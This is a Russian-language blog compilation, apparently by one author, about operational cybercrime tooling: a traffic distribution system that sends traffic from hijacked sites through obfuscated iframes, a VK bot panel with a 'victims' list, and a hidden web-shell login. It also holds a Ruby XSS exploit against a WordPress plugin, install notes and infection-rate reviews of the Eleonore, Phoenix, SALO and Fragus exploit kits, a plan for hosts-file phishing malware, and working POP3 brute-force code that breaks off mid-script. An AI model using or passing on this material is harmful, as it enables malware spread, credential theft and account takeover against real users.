распределенность

Эта TDS распределенная т.к., как вы уже догадались, может располагатся на нескольких независимых друг от друга серверах, а точнее на 2-х. Все дело в том, что она состоит из 2-х частей:

1. модуль определения региона и ведения логов
2. модуль управления (главный) или сам интерфейс TDS

Помимо этого существует еще 3-я функциональная часть, которая располагается у клиента т.е. у нашего трафа.

минимальная нагрузка

Да, вы не ослышались, данная TDS практически не создает нагрузку на сервер БД, а на WEB-сервер нагрузка, небольше чем на простенький сайтик из тех, что размещают на narod.ru.

клиентская часть

Если вдруг кто-то, использовал lukmuTDs предыдущих версий, то он знает, что в ней все делится на схемы (schemas), цели (aims) и сайты (sites). В меню сайты задаются, по желанию, сайты откуда идет траф, в целях – куда пойдет траф, и в главном меню задаются сами схемы потока трафика, т.е. из какого сайта на какую цель/цели пойдет трафик, в каких количествах, какой браузер и регион.

Так вот, основная ресурсоемкая задача – определить какой схеме принадлежит запрос. В предыдущих версиях этим занималась TDS, в результате чего были постоянные обращения к БД.

Теперь все не так, после создания всех схем БД больше не нужна и обращений к ней от трафика не будет. Все дело в том, что теперь схему и цель определяет сам браузер т.е. трафик сам себя обрабатывает. А если подробнее, то выбор за трафик осуществляет JavaScript, который загружается в браузер.

Но, тогда возникает резонный вопрос – как генерируется JavaScript, вся информация о схемах записывается в БД, значит при генерации скрипта задействуется БД тем самым нагрузка на БД не снижается. А вот и нет, JS генерируется только один раз, после того как вы создали или изменили схему, сайт или цель. После этого JS кэшируется и когда трафик запрашивает JS, он выдается из кэша без какого-либо обращения к БД и минимальном участии PHP, что в данном случае равносильно запросу обычной статической HTML странички.

модуль определения региона

Этот модуль при больших объемах трафика (свыше 500 000 запросов) желательно разместить на отдельном хостинге, при меньших объемах можно оставить и на том же сервере что и главная часть.

Он представляет из себя один PHP-скрипт и директорию с файлом, куда будут ненадолго записыватся запросы. Его необходимо будет отдельно сконфигурировать, но об этом ниже.

Как видите здесь вообще нет БД, а все участие PHP описывается на 40 строчках, с учетом комментариев. Т.е. в данном случае нагрузка на сервер так же не далека от выдачи статической страницы.

основной интерфейс TDS. модуль управления

Интерфейсная часть по сравнению с прошлыми версиями потерпела серьезные изменения. Обращения к БД происходит только в 2-х случаях:

• при изменении схемы, сайта или цели
• при обновлении статистики

Для первого случая, все итак понятно – трафик стабильно идет, покупатели надежные, деньги капают – ничего менять не надо – обращений к БД нет.

Что касается статистики, то частоту ее обновления вы настраиваете сами. Поставите 1 час – про БД вообще забудите, поставите 30 сек – хостинг вас забанит. Короче, частота настраивается cron’ом т.к. скрипт обновления будет запускатся именно им, при гигантском трафе нормальныи будет 20-30 минут, если трафик не превышает 30-50к то можно поставить и 5 минут.

интерфейс

Как я уже говорил, интерфейс изменился. Самым главным новшеством является возможность множественного выбора целей, иначе говоря, создания параллельных потоков трафика.

параллельность и объединение

Зайдем в меню схемы и увидим

возможность выбрать для одного потока несколько целей, несколько сайтов и группы регионов и браузеров. Насчет сайтов, регионов и браузеров я думаю все понятно, ничего сверхъестественного тут нет. А вот с групповой политикой целей разберемся.

В предыдущих версиях TDS перенаправляла трафик на цель обычным редиректом, сейчас же все не так. Как уже говорилось выше, во-первых теперь этим занимается не TDS, а JavaScript из кэша, а во-вторых теперь нет редиректов, а есть формирование HTML-страницы с таким количеством iframe’ов, какое заданно в схемах, а точнее сколько целей задано на конкретную схему.

процентное деление потока

Как видно на предыдущем скрине, теперь трафик можно разделять т.е. не паралельно пускать, а именно делить. Чтобы это понять надо либо прочитать про интерфейс предыдущих версий, либо читать далее.

Схема для запроса из потока выбирается в соответсвии с позицией схемы в меню т.е. представим:

1. идет запрос на сайт, где стоит ифрейм на TDS
2. TDS выдает из кэша JS
3. JS просматривает все схемы сверху вниз и выбирает схему с наивысшей позицией, которой удовлетворяют характеристики запроса (рефер, регион, браузер)

Допустим запрос из потока трафика не удовлетворил первой схеме, тогда он проверяется второй. Пусть он удовлетворил 2-й и если во 2-й схеме процент 100%, то на этом выбор закончен. Если же процент скажем 50%, в таком случае на помощь идет теория вероятности.

Сейчас я расскажу очень простой принцип, однако, не все знают что он носит имя метод Монте-Карло. Так вот, если процент отличен от сотни, то генерируется случайное число от 0 до 100 и если процент больше либо равен случайному числу, то трафик идет по выбранной схеме, в противном случае он будет дальше перебирать схемы. Именно поэтому рекомендуется в качестве последней схемы ставить например google.com-ALL-ALL-ALL-100%.

Так же в схемах есть управляющие кнопки:

• редактировать
• удалить
• поднять вверх
• остановить
• обнулить статистику

И кнопка ‘поднять вверх’ служит именно для поднятия приоритета схемы, короче для того, что я описал выше.

меню promo

Как и раньше в promo выдаются ссылки и криптованные ссылки на TDS т.е. те которые нужно вставить в захваченый сайт. Однако теперь ссылки делятся на 2 категории:

1. JAVASCRIPT LINKS
2. PHP LINKS

Такое разделение объясняется тем, что они ведут на разные обработчики трафика TDS. Так как lukmuTDs v1.1x может работать в 2-х режимах:

1. как раньше т.е. трафик обрабатывается TDS (PHP LINKS)
2. по-новому т.е. трафик обрабатывается JS из кэша (JAVASCRIPT LINKS)

Как и раньше ссылки представляются в 3-х видах:

1. естественный
2. закриптованный методом Packed
3. закриптованный методом Packed и облаченный в ASCII-коды, дабы не было никаких ковычек (часто нужна, когда ссылка на TDS вставляется не в файл, а в БД)

На дне страницы есть еще форма, куда можно вбить свою ссылку и оттуда она выйдет закриптованной и облаченной в ASCII.

установка и конфигурация

установка

Здесь я рассмотрю установку на 2 сервера, установка на 1 сервер происходит аналогично.

1. кидаем на первый сервер (geo) скрипт geo.php и папку logs
2. выставляем права 0777 на logs и на файл, внутри папки (по умолчанию kju_log)
3. все остальное кидаем на главный сервер с TDS
4. дамп БД импортируем из файла с дампом (lukmutdsv1.11.sql)
5. выставляем права на папку cache 0777

конфигурация

GEO-сервер

Отворяем файл geo.php и видим в начале файла:

//config
$key="key_which_2_auth_on_geo";
$statfile="logs/kju_log";
//===================

$key – ключ, по которому основной модуль TDS будет синхронизироватся с GEO. Вбиваем туда бессмысленные набор букв и цифр.

$statfile – путь до файла-лога.

основной модуль TDS

Открываем config.php и видим:

define('inc_dir',$_SERVER['DOCUMENT_ROOT']."/includes/");
define('ua_pass',md5("this_is_random_symbols")); //user-agent pass
define('uauth',false); // user-agent auth on/off
//js-cookies
define('ltds2c','this_is_random_symbols');
define('uniqc','this_is_random_symbols_too');
//geo
define('geo_location','http://path2.site.with.geo.com/geo.php');
define('geo_key','key_which_2_auth_on_geo');

Константа ua_pass – ключ авторизации по header’у браузера, ее можно выключить если в константе uauth выставить false (по умолчанию так и стоит).
Константы категории js-cookie – рудимент от версии 1.10 (данная версия 1.11), однако его все равно надо заполнить какими-нибудь символами.
geo_location – путь до geo.php, geo_key – ключ для сбора статистика, указываем то что забили в geo.php.

Теперь открываем includes/db_config.php и настраиваем доступ к БД:

$db_host="localhost";
$db_user="tds_db_user";
$db_pass="tds_db_pass";
$db_name="tds_db_name";
$sol="a_lot_of_random_symbols";
$sol_pass="a_lot_of_random_symbols_too";
$db_type="mysql";
$db_host="localhost";

Заполняем пользователя, пароль, имя и хост БД. Затем придумываем соли.

Теперь осталось только поставить в cron’е запуск скрипта getstat.php и частоту его запуска.

TDS готова. Заходим на сайт с TDS и регистрируемся, после чего заходим в TDS.

Скачать lukmuTDs v1.11.

P.S. а ведь была еще и lukmuTDs v1.1. У нее статистика считалась по AJAX’ому отстуку, но как показала практика такая стата не реалистична т.к. не смотря на то что ajax-вый запрос отправлялся на хост с которого был загружен JS-скрипт (обычная метода обхода ограничения xmlhttprequest на тот же домен, что и страница) не многие браузеры все же отправляют запрос.

патч для lukmuTDs v1.11

Скачать: http://www.sendspace.com/file/jp749m
Исправлена ошибка в работе getstat.php, когда запускается от cron’а. В config.php введен новый параметр – полный путь к директории TDS.

lukmuTDs v.1.111

Скачать: http://www.sendspace.com/file/bgv6ak

Исправлена ошибка в обновление последнего визита с сайта.

Все скрипты были с чистого листа переписаны с Ruby на PHP. Добавлена куча всяких штук, в том числе и обход капчи, методом привлечения пользователей сайта ввести ее. Полностью изменена архитектура приложения.

Засчет изменения архитектуры имеется возможность добавить в перспективе много разных примочек, в том числе управление большим числом ботов и анкет, в промышленных масштабах.

сайт и его интерфейс

Сайт располагается на том же домене, что и первая версия – ii.lukmus.ru. И на данный момент представляет из себя 3 основных раздела:

• сам диалог ботов
• список заданий
• список жертв

список жертв

Здесь выкладываются все профайлы с кем когда-либо общался кто-либо из ботов.

список заданий

Тут располагаются все задания, на данный момент это выслать приглашение на дружбу, которые были предложены ботам.

Задания могут иметь статус ‘выполнено’ и ‘в очереди’. Что они означают ясно всем, однако, нужно знать, что даже если у задания статус ‘выполнено’ это не значит что пользователь ВК, которому адресовано приглашение, получил его. Запрос, который отсылает бот полностью идентичен запросу от браузера, проблема в том, что ВК руководствуется не известным науке принципом принимать или не принимать запрос. Статистика гласит, что проходит порядка 80%-90% запросов.

Также нужно помнить, что в ВК есть ограничения на приглашения в единицу времени т.е. не больше 80 приглашений в сутки с одной анкеты.

В этом разделе есть еще фильтр, если кому-то интересно какие задания были у какого бота, то в поле фильтр нужно ввести iid бота, которое можно посмотреть в адресной строке.

Страница начинена AJAX’ом и обновляется сама, в том числе и если задан фильтр.

диалог

На главной странице находится список активных ботов, пройдя по одной из ссылке вы попадаете на диалог в реальном времени.

Эта страница также самообновляется засчет все того же AJAX’а.

Здесь можно дать задание боту – текстовое поле внизу. Если нужно наблюдать беседу бота с каким-то конкретным человеком, то следует ввести в фильтр (текстовое поле вверху) id анкеты ВК. Скрипты AJAX’а также поддерживают фильтр.

капча

Так как ВК крайне подозрителен и частенько грешит капчами, то переодически капча будет выскакивать внизу левой колонки на всех основных страницах сайта. Пожалуйста, не пройдите мимо и помогите боту – введите капчу.

Вот собственно все. Если у вас есть какие-то пожелания, вопросы или хотите своего бота – пишите здесь.

1. исправлен AJAX на страницах просмотра диалога и заданий
2. исправлена проблема с отображением HTML-тэгов в сообщениях от бота
3. немного изменена страница ‘Жертвы’ – теперь отображается количество жертв и список жертв выводится с самых последних до самых первых т.е. на первой странице последние жертвы.

если вы хотите добавить своего бота

Как показала практика, большинство людей до сих пор не признают преймущества жаббера и сидят в аськах. Так же практика показала, что метод, которым я предложил подавать заявки,  крайне смахивает на бедлам и вакханалию. В связи с этим, пока iLukmus находится в пилотном режиме т.е. еще недельку, и пока руки у меня не дойдут, чтобы сделать регистрацию пользователей добавление не моих ботов преостановлено.

Вообщем мне понадобилось и я дописал пару строчек, выполняющих авторизацию.

Я предлагаю 2 вида авторизации:

• ввод пароля в адресной строке методом GET
• хэш пароля в User-Agent браузера

Второй способ мне больше нравится т.к. не надо ничего запоминать, однако в таком случае если вы зайдете с этого браузера на любой другой сайт, то ваш хэш с легкостью будет перехвачен и записан в лог апача. Поэтому лучше использовать 2 способа одновременно.

Конфиг авторизации лежит в самом начале скрипта шелла:
//---------------------config-
$get_pass=md5("getpass"); //пароль по GET
$ua_pass=md5("uapass"); //пароль по User-Agent
$auth_var=array(
'get_pass'=>true, //вкл/выкл GET
'user_agent'=>false); //вкл/выкл User-Agent
//----------------------------

В случае неудачной авторизации шелл выдаст ошибку 404 и немного изменит в адресной строке адрес т.е. заредиректит на схожий путь, тем самым запутав любопытного админа.

Ввод пароля по GET делается так:
/path/to/shell.php?kw=getpass

Для того, чтобы войти по User-Agent нужно вбить в браузер, чтобы он давал такой заголовок в пакете. Например в Firefox’е это делается так:

• в адресной строке вводим about:config
• в поле фильтр вбиваем general.useragent.extra.firefox
• дописываем в значение поля хэш нашего $ua_pass

Скачать это дело можно тут.

установка

1. закачиваем архив (ссылка на скачку внизу) на сервер и распаковываем его.
2. в архиве вы увидете файл lukmutds.sql – это дамп базы, через phpMyAdmin восстанавливаем базу.

конфигурация

1. файл config.php не трогаем!
2. открываем файл /includes/db_config.php и видим:
   $db_host="localhost";
$db_user="";
$db_pass="";
$db_name="";
$sol="u9h79yf479fhuihdsuifyhdsu";
$sol_pass="9f8y3u48f9uh34uiojf8j3";
$db_type="mysql";

   Первые 4-ре, я думаю, понятны всем.  $sol_pass – соль при записи пароля пользователя в БД, $sol – соль для кукисов. Короче в соли надо напихать всякой чертовщины, 20-30 символов.

эксплуатация

Для начала нужно зарегистрироватся. Для этого нужно пройти по ссылке register – /index.php?pl=register.

После того как вы зарегистрировались и зашли. Вы попадаете на меню схем. Вообще там есть 4 меню:

• schemas – схемы
• aims – цели т.е. сайты куда будет направлятся трафик
• sites – сайты откуда будет идти трафик
• promo – здесь выдается iframe и обычная ссылка

Сначала надо заполнить меню sites, там все просто и интуитивно понятно. Далее таким же образом заполняем цели – aims.

Теперь можно приступать к схемам:

1. нажимаем кнопку ‘add new’
2. в выпадющем списке выбираем цель (aim)
3. выбираем сайт или оставляем ALL (любой сайт)
4. выбираем страну (geo) или оставляем ALL (любая страна)
5. выбираем браузер (agent) или оставляем ALL (любой браузер)
6. нажимаем кнопку ‘add new’, если хотите добавить еще схему или ‘save all’ для сохранения

По нашей схеме трафик попадет на целевой сайт (aim) если он удовлетворит всем условиям т.е. рефу, сайту откуда пришел (site), стране происхождения (geo) и браузеру (agent).

Важно понимать, что схемы анализируются сверху вниз т.е. допустим у нас есть такие схемы:

1. google.com <-> ALL <-> US <-> MSIE
2. yahoo.com <-> ALL <-> ALL <-> MSIE
3. yandex.com <-> ALL <-> ALL <-> ALL

тогда все, кто с США и у кого браузер Internet Explorer попадут на google.com, те кто остался и у кого браузер также IE, но им не посчастливилось родится в Пендостане пойдут на yahoo.com. И только те кто не попал на гугл и яху пойдут на яндекс т.е. у кого не IE и не US.

В меню схем еще есть 2 пиктограммы: edit и drop – соответственно править и удалить схему. Праве пиктограмм расположен счетчик, показывающий количество переходов по схеме.

минусы

Главный минус – определение региона трафика осуществляется через запрос к внешнему сайту. Это можно исправить, если вести свою базу, периодически обновляя ее cron’ом.

Второй недочет – регулярные выражние для URL, используемое при добавление сайта в aims и sites. Поменять регулярку можно в lib.php в функции url_reg_exp().

Скачать TDS можно здесь (LukmuTDs v 1.000).

LukmuTDs v 1.001 17.09.2010

Скачать: http://www.sendspace.com/file/zerwqc

Исправления:

• дамп БД
• INSERT SQL-inj в to.php (функция fix_traf())
• PHP-inc

LukmuTDs v 1.002 22.09.2010

Скачать: http://www.sendspace.com/file/xf526i

Изменения:

• интерфейс панели ‘схемы’
• заменена система определения местоположения на WorldIP

Добавлено:

• статистика уникального трафика
• возможность менять порядок схем

LukmuTDs v 1.003 28.09.2010

Скачать: http://www.sendspace.com/file/jdnjmz

Добавлено:

• Панель ‘sites’
  • IP и время последнего посещения сайта
• Панель ‘schemas’
  • обнуление статистики
  • остановка/возобновление работы схемы
• Панель ‘promo’
  • обфусцированный iframe в виде ASCII-кодов (полностью отсутствуют любые кавычки)
• Общее
  • время сервера и IP пользователя

Закрыто:

• SQL-inj в смене порядка схем. В предыдущей версии пользователь TDS мог поменять порядок схем другого пользователя.

LukmuTDs v 1.0031 21.10.2010

Скачать: http://www.sendspace.com/file/mkmyf1
Добавлена авторизация по User-Agent. Чтобы ее включить или выключить в файле config.php нужно обозначить константу uauth как true или как false соответственно. Пароль задается константой ua_pass в этом же файле.

Актиная XSS наблюдается в таких разделах плагина как ‘Рефереры’, ‘Агенты’ итд, короче везде, где наблюдаются данные заголовка HTTP-пакета, разумеется кроме кукисов.

Тестировалось на mystat 2.6 (на данный момент последняя версия) и WordPress 2.9.2. Существует отличная от нуля вероятность, что эта бага актуальна для всех версий WordPress и всех существующих на данный момент версий mystat.

Эксплойт

Эксплойт написан на Ruby, как установить и запустить Ruby читайте в предыдущих статьях этого блога.

#!/usr/bin/ruby
require 'net/http'
http = Net::HTTP.new('very.popular.blog.ru', 80)
path = '/'
headers = {
'Referer' ='<script>alert(/XSS/);</script>',
'User-agent' ='<script>alert(/XSS/);</script>'}
resp, data = http.get(path, headers)
if resp.code.to_i==200 then puts "Exploiting OK"
else puts "Exploiting failed" end

Фикс
Открываем /wp-content/plugins/wp-mystat/mystat.php и фильтруем в функции function myStat_header() html-теги функцией htmlspecialchars():

$US['lang']=htmlspecialchars((string)substr($GLOBALS['_SERVER']['HTTP_ACCEPT_LANGUAGE'],0,2));
$US['user_agent']=htmlspecialchars((string)$GLOBALS['_SERVER']['HTTP_USER_AGENT']);
$US['referer']=(string)isset($GLOBALS['_SERVER']['HTTP_REFERER'])?htmlspecialchars($GLOBALS['_SERVER']['HTTP_REFERER']):'';

Здесь приведен не полный список полей, которые надо фильтровать.

Статья не призывает ни к каким действиям, противоречащим законодательству.
Ответственность за использование материала ложиться только на вас!

Представляет она из себя набор PHP скриптов. Основная часть предназначена для партнера, там отображается его статистика, баланс и промо. Вторая часть вставляется в страницу(ы) для, которых предназначена ПП. Так же в комплект входят SQL-код для создания необходимой для CMS БД.

Скачать это чудо экстремального программирования можно здесь.

Установка

Ничего не может быть проще чем установка этой CMS.

1. После того, как вы распаковали архив, закидываем все что там было на сервер, разумеется кроме файлов readme и sql.sql.
2. Внимательно читаем readme, даем почитать его всем своим друзьям и подругам, а так же родителям читаем вслух, после чего удаляем.
3. Открываем sql.sql и создаем БД в MySQL точно в соответствии с запросами в этом файле, или же можно просто импортировать его в БД, посредством phpMyAdmin.
4. Теперь открываем исходный код страниц ПП, по которым будет учитыватся траф и вставляем туда такой код
   
include "partner/config.php"; //относительная ссылка на config.php
if(isset($_GET['r'])){
$r=(integer)$_GET['r'];
$ip=$_SERVER['HTTP_X_REAL_IP'];
$ref=$_SERVER['HTTP_REFERER'];
if (strlen($ref)<1) $ref=" - "; $cost=0.00; $bd=new mysqli($bd_host,$bd_user,$bd_pass,$bd_name); $res=$bd->query("SELECT cost FROM seller WHERE r=$r;");
while($row=$res->fetch_row()){
$cost=(float)$row[0];
}
$now_date=date('Y-m-d');
$hash=md5($now_date.$ip);
$exist=false;
$res=$bd->query("SELECT uniq_hash FROM traf WHERE uniq_hash='$hash';");
while($row=$res->fetch_row()){
if (strlen($row[0])>1)$exist=true;
}
$pay=0;
if (!$exist) $bd->query("INSERT INTO traf VALUES (NULL, $r,'$ip','$ref','$now_date',$pay,$cost,'$hash');");
$res->free();
$bd->close();
}


Конфигурация

Когда я в прошлом абзаце сказал, что не может быть ничего проще установки, я соврал – конфигурирование гораздо проще.

Открываем config.php и видим там

// параметры БД
$bd_host="localhost";
$bd_user="bd_user";
$bd_pass="bd_pass";
$bd_name="bd_name";
//-----------------------
$unikey=md5("universal_key"); //универсальный ключ
$site_name_partner="your PP name"; //заголовок ПП
$default_partner_cost=0.00; //стоимость клика по умолчанию
$admin_contacts="icq: 000000"; //контакты администрации

Я думаю тут все предельно просто, объяснить следует лишь переменную $unikey. Дело в том, что в этой CMS нет админки, зато есть универсальный ключ равный $unikey. Админ зная почту какого-либо пользователя может зайти в его аккаунт посредством уникея и там посмотреть его баланс, статистику итд.

Возможно вы хотите меня спросить: “Если админ знает почту аккаунта, посмотрев ее в БД, почему же он не сможет посмотреть там пароль от его акка?”, а я вам отвечу – т.к. в БД хранятся только md5-хэши паролей.

Так же вам скорее всего придется поменять логотип ПП (img/logo.png), дизайн (screen.css) и правила ПП (partner_rules.pdf).

По всем вопросам обращайтесь сюда. Если этот ‘движок’ будет кому-нибудь интересен, включая меня, вполне вероятно, что он начнет развиватся.

Под связки нужно написать какого-нить бота, ну или купить. Конечно, лучше всего купить какого-нибудь Зевса, но стоит он чуть ли не дороже связок. Поэтому я решил не торопить события и написал свою простенькую прожку, которая подменяет hosts на фейки соц.сетей, где собственно зараженный сначала отдаст мне свой логин с паролем, а затем получит окно с активацией под SMS. Префиксов, слава Богу, у меня хватало, так что дело встало за прогой, о ней я напишу в следующей статье. А пока перейдем к связкам.

Найти в паблике более-менне актуальные связки оказалось не такой уж и простой задачей, но я, гугл и яндекс все же справились с ней.
Все связки я качал отсюда, в связи с чем я очень благодарен этому форуму и тем кто выкладывал связки лично.

То что я здесь расскажу скорее всего мало относится к приватным (платным) версиям этих связок и актуально только для этих полуприватных вариантов.

Значит как я действовал:

• устанавливал связку на заренее подготовленный хостинг
• закидывал свою программку
• брал один из своих сайтиков и ставил туда iframe на связку
• пробывал связку через Virtual Box с Windows XP на IE6, IE8 и FF 3.5
• в случае если у какой-нибудь вариант из 3-х приведенных в пункте выше загружал программку, то покупал через одну систему обмена траффиком от 0.5 до 1к траффа

Необходимо так же заметить, что установка этих вариантов этих связок обладает не самым дружественным интерфейсом и мне приходилось самому немного править некоторые скрипты. Короче без минимальных знаний PHP и маленького опыта работы с PHPMyAdmin тут не обойтись.

Eleonore Exp pack 1.3.1

Установка

После того как закинули на хостинг, делаем БД и прописываем настройки в файле ‘config.php’. В этом же файле строки:

<?php
/*$to = “cmail014@gmail.com”;
$from = “someonelse@example.com”;
$headers = “From: $from”;
mail($to,$subject,$headers,$admin,$pwd);*/
?>

либо удаляем, либо комментируем.

Далее если мы почитаем файл readme.txt, то нам нужно запустить ‘install.php’, однако в данном варианте его нет, поэтому руками открываем файл ‘dump.sql’ и создаем структуру БД в соответсвии с запросами приведенными там, а конкретнее:

CREATE TABLE IF NOT EXISTS `seller` (
`id` int(10) NOT NULL auto_increment,
`name` varchar(30) default NULL,
`link` varchar(150) default NULL,
`desc` varchar(500) default NULL,
PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=cp1251 AUTO_INCREMENT=6 ;

и

CREATE TABLE IF NOT EXISTS `statistic` (
`id` int(10) NOT NULL auto_increment,
`ip` varchar(15) default NULL,
`os` varchar(30) default NULL,
`br` varchar(30) default NULL,
`country` varchar(2) default ‘–’,
`good` int(1) NOT NULL default ’0′,
`mv` int(1) NOT NULL default ’0′,
`refer` varchar(300) NOT NULL,
`date` datetime default ’2009-01-01 00:00:00′,
`spl` varchar(30) default NULL,
`seller` varchar(150) default NULL,
PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=cp1251 AUTO_INCREMENT=149 ;

Теперь выставляем права на директорию load и все ее содержимое 0777.

Эксплуатация

Путь к админке: <имя домена>/stat.php.

В админке все предельно просто и понятно:

• в разделе Resseler добавляем продавца или просто место откуда льется трафф и нажав на ссылку Links info получим ссылку, которую нужно вставить в iframe;
• в File загружаем нашего бота;
• в Main смотрим статистику

Итоги

Пробив плохой, а точнее на моих 2-х самых небезопасных в мире Windows XP без антивирей и без фаерволов, с самыми непропатченными браузерами в мире ничего не прокатило. Что касается интерфейса, то он достаточно хороший и приятный и самое главное удобный.

Вообщем, если в приватных версиях сплойты более работоспособны, то можно брать, правда цен я не знаю.

Phoenix exploit’s pack

Установка

• делаем БД с пользователем
• правим конфиг configuration/config.php
• заливаем бота в корень и называем его exe.exe (не факт, т.к. нет мануала, я решил что это наиболее вероятный вариант)
• запускаем recrypt.php и следуем инструкциям

Эксплуатация

Админка, если ее можно назвать таковой, находится по адресу <имя домена>/statistics.php.

Где смотреть ссыль под трафф я так и не нашел и методом тыка определил, что либо <имя домена>/index.php, либо <имя домена>/load.php.

Что касается пробива тут все плохо, и не смотря на то что на скрине стоит 100% пробива я могу сказать что он скорее нулевой.

Немного погуглив, я тут выяснил, что отвязали 2-ю версию phoenix и прочитать про нее можно здесь.

SALO PACK © UASC

Установка

• создаем БД с пользователем
• настраиваем cfg.php
• запускаем sql.php

Эксплуатация

Админка находится по адресу: <имя домена>/admin.

Во вкладке ‘Настройка’ заливаем бота и производим другие настройки.

Ну и собственно ставим iframe на http://<имя домена>/index.php.

Итоги

Статистика врет – пробив нулевой или неуклонно стремится к нему.

Интерфейс хороший, я бы даже сказал приятный и удобный, там даже есть AJAX’ое обновление. Статистика достаточно детальная, впрочем вы сами можете это видеть на скрине.

Fragus exploit pack v1.0

Установка

• создаем БД с пользователем под нее
• правим конфиг /secure/config.php
• открываем в редакторе /secure/_install.php и приводим его в следующий вид:
  

  <?php
  include (“config.php”);
  if (!($c = mysql_connect($config['MysqlHost'], $config['MysqlUser'], $config['MysqlPassword']))) {
  die(“Check host, user or password (./cfg/config.php)”);
  }
  if (!mysql_select_db($config['MysqlDbname'],$c)) {
  die(“Check DB name (./cfg/config.php)”);
  }

  if (!mysql_query(“DROP TABLE IF EXISTS `statistic`;”,$c)) die(“Check permission for user ‘”.$config['MysqlUser'].”‘”);

  if (!mysql_query(“CREATE TABLE `donkeys` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `ip` int(10) unsigned NOT NULL DEFAULT ’0′,
  `seller` int(10) unsigned NOT NULL DEFAULT ’0′,
  `browser` set(‘MSIE’,'FIREFOX’,'OPERA’,'CHROME’,'SAFARI’,'OTHER’) NOT NULL DEFAULT ‘OTHER’,
  `browser_version` varchar(10) NOT NULL DEFAULT ’0′,
  `os` set(’95′,’98′,’ME’,’2000′,’2003′,’XP’,'VISTA’,'WIN7′,’MAC’,'LINUX’,'OTHER’) NOT NULL DEFAULT ‘OTHER’,
  `os_version` set(‘SP1′,’SP2′,’SP3′,’SP4′,’OTHER’) NOT NULL DEFAULT ‘OTHER’,
  `country` tinyint(3) unsigned NOT NULL DEFAULT ’0′,
  `file` int(10) unsigned NOT NULL,
  `exploit` tinyint(2) unsigned NOT NULL DEFAULT ’0′,
  `status` set(‘NOT’,'LOAD’,'BACKCONNECT’) NOT NULL DEFAULT ‘NOT’,
  `time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  UNIQUE KEY `ip` (`ip`)
  ) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=1 ;”,$c)) die(“Check permission for user ‘”.$config['MysqlUser'].”‘”);

  die(“<html><head><title>Unique pack</title><link type=’text/css’ rel=’stylesheet’ href=’./cfg/style.css’>
  </head><body bgcolor=’#E5E5E5′ text=’black’>
  <center><img src=’./img/logo.gif’><br>
  <br>Installation finished<br>Please delete install.php</center></body></html>”);
  ?>

• теперь запускаем /secure/_install.php

Примечание: я уже не помню где точно, но в процессе работы в админке могут вылетать различные MySQL ошибки, так вот для того чтобы их не было смотрим скрипт в котором была ошибка и заменям там в функциях mysql_connect() и mysql_select_db() переменные, которые теоретически равны пользователю, имени БД, хосту БД и паролю админа БД на те переменные, что указанны в конфиге т.е. $config['MysqlHost'], $config['MysqlUser'] и т.д. или на строки с этими значениями, последний вариант это кривое программирование, однако в данном случае он предпочтительнее.

Эксплуатация

Интерфейс просто шикарен.

Я тут даже ничего описывать не буду, там и так все понятно. Хочу лишь отметить что ссыли в том числе и iframe связка выдает во всех возможных вариантах, включая криптованный.

Итоги

Из всех рассмотренных связок Fragus самая лучшая по всем показателям. И не смотря на то что она уже относительно древняя у нее не плохой пробив для публичной (1.68% это не совсем верно т.к. весомая часть трафика который я туда лил заведомо не мог прокатить, примерный пробив составит около 3-6%).

P.S. я был бы очень благодарен всем кто скинул бы сюда или мне лично ссылку на публичную или полуприватную связку, не рассмотренную здесь.

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.

Ниже я покажу как можно бесплатно (обычные брутфорсы обычно работают через прокси/соксы, которые либо бесплатные и очень долгие, либо платные) и главное быстро перебирать пароли к ящикам.
Моя первоначальная идея состояла в организации злой бот-сети из фрихостов, но об этом я расскажу в другой статье, пока лишь ограничимся одной функцией бота – попытка авторизации на POP3-сервере.

Итак, для начала нам нужен какой-нибудь бесплатный хостинг с поддержкой PHP5, версия должна быть именно пятая, в противном случае придется немного переписать серверные скрипты.
Допустим вы нашли фрихостинг, коих сейчас немерянно, и можно приступать к самому приложению, которое будет представляеть из себя многопоточный брутфорс списка мыл на популярные пароли. Если кому-то нужно иначе, клиентскую часть легко переписать на свой лад.

Брутфорс будет состоять из 2-х частей:

1. серверная – PHP-скрипты, которые будут по запросу клиента пытатся авторизоватся с заданным логином и паролем
2. клиентская – Ruby-скрипты, которые будут давать запрос, с указанием логина и пароля, по которым необходимо авторизоватся

Сервер (PHP-скрипты).

Сервер будет состоять из 3-х файлов:

1. библиотека – lib.php
2. конфигурация – config.php
3. сам скрипт авторизации – brut.php

В библиотеки lib.php содержится класс Email, который через функцию fsockopen() будет общатся с POP3-сервером. Взят именно такой принцип, а не скажем уже готовая mail() т.к. на более-менее нормальных хостингах подобные штуки отключены, запрещены и являются признаком преступления против человечества.

Итак, сам lib.php:

<?php
class Email {
var $server;
var $full_addr;
var $login;
const SOCK_ERR=-3;
const FST_GET_ERR=-2;
const LOGIN_ERR=-1;
const INCCORECT_PASS=0;
const SUCC=1;

function __construct($addr)
{$this->full_addr=$addr;
$this->set_serv();
$this->set_login(); }

private function set_serv ()
{$strpos=strpos($this->full_addr,’@');
$this->server=”pop.” . substr($this->full_addr,$strpos+1,strlen($this->full_addr)-$strpos); }

private function set_login ()
{$this->login=substr($this->full_addr,0,strpos($this->full_addr,’@')); }

public function try_auth ($pass)
{ $pop_conn = fsockopen($this->server, 110,$errno, $errstr, 10);
if (!(is_resource($pop_conn))) return -3;

$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))    return -2;

fputs($pop_conn,”USER $this->login\r\n”);
$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))    return -1;

fputs($pop_conn,”PASS $pass\r\n”);
$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))return 0;

fclose($pop_conn);
return 1;
}
}
?>

Далее файл config.php, он не отличается сложностью и представляет из себя 2 переменные хранящие логин и пароль админа брутфорса, мы же хотим единолично пользоватся нашим брутом.

<?php
$login=”root”;
$pass=”jvgfdhg6hj”;
?>

Теперь перейдем к brut.php, который и будет промежуточным звеном между нашей клиентской частью и POP3-сервером.

<?php
include ‘lib.php’;
include ‘config.php’;

if (!isset($_POST['login']) || $_POST['login']!=$login) die();
